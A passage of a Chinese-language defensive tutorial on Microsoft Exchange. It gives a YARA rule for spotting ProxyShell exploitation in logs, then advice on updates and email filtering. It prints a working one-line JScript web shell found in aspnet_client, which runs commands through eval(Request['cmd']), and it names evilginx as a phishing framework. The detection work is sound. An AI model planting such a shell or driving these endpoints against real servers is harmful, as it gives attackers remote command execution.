Exchange防御
1. ProxyShell检测
如 Vulnerabilities 部分所述, ProxyShell 利用了 Pre-auth Path confusion 以及我们用作POC的 URI,攻击目标为 /autodiscover 端点。我们可以使用 expl_proxyshell.yar YARA 规则来监控上述端点
<SNIP>
rule EXPL_Exchange_ProxyShell_Successful_Aug21_1 : SCRIPT {
meta:
description = "Detects successful ProxyShell exploitation attempts in log files"
author = "Florian Roth (Nextron Systems)"
score = 85
reference = "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html"
date = "2021-08-08"
modified = "2021-08-09"
id = "8c11cd1a-6d3f-5f29-af61-17179b01ca8b"
strings:
$xr1a = / \/autodiscover\/autodiscover\.json[^\n]{1,300}\/(powershell|X-Rps-CAT)/ nocase ascii
$xr1b = / \/autodiscover\/autodiscover\.json[^\n]{1,300}\/(mapi\/nspi|EWS\/)[^\n]{1,400}(200|302) 0 0/
$xr2 = /autodiscover\/autodiscover\.json[^\n]{1,60}&X-Rps-CAT=/ nocase ascii
$xr3 = /Email=autodiscover\/autodiscover\.json[^\n]{1,400}200 0 0/ nocase ascii
condition:
1 of them
}
<SNIP>
上述规则包含用于检测 Web Shell 的各种规则,类似于我们在 Vulnerabilities 部分使用的 PST 格式 Web Shell
查看 C:\inetpub\wwwroot\aspnet_client 目录,我们可以看到创建了一个名称特殊的文件
PS C:\inetpub\wwwroot\aspnet_client> ls
Directory: C:\inetpub\wwwroot\aspnet_client
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/5/2024 7:27 AM system_web
-a---- 7/15/2024 8:02 AM 271360 basbpregxiaybeih.aspx
通过对文件进行 strings 分析,我们可以发现它包含一个 JScript ,该脚本利用 eval() 函数在目标上运行命令
strings basbpregxiaybeih.aspx | grep cmd
_ise6<script language='JScript' runat='server' Page aspcompat=true>function Page_Load(){eval(Request['cmd'],'unsafe');}</script>
2. 更新
微软致力于每季度发布名为 “累积更新” (CU)的更新。这些更新通常用于修复诸如 ProxyShell 等漏洞。累积更新根据当前使用的版本而有所不同,我们可以参考微软的文档来下载并了解每个累积更新对应的内部版本号。微软将更新分为 Security Update (SU)和 Hotfix Update (HU)。
3. 保护
每个组织在电子邮件保护方面都有不同的策略,用于检测垃圾邮件或信誉不良的电子邮件地址。最受欢迎的电子邮件安全解决方案提供商包括 Proofpoint 、 Microsoft Defender for Office 365 、 Cisco Secure Email Threat Defense 等。每个安全解决方案都有一个专用的管理面板,供安全运营中心 (SOC) 分析师操作。此外,系统管理员或其他人员会配置解决方案以满足特定预期,从而最大限度地减少潜在威胁。Microsoft Exchange 允许对反垃圾邮件和反恶意软件进行精细配置,Exchange 管理员可以仔细检查附件允许的文件扩展名,从而减少攻击者可利用的潜在攻击面。
在企业中保持以安全为导向的纪律至关重要,因为威胁行为者不断寻找新的方法来诱骗受害者提交个人信息(凭证)。红队成员最常用的框架之一是 evilginx ,它旨在模拟合法网站并转发其连接。一些近期使用的攻击手段包括强迫受害者打开或从可疑网站下载文件、完成调查问卷或其他商业伙伴提供的服务。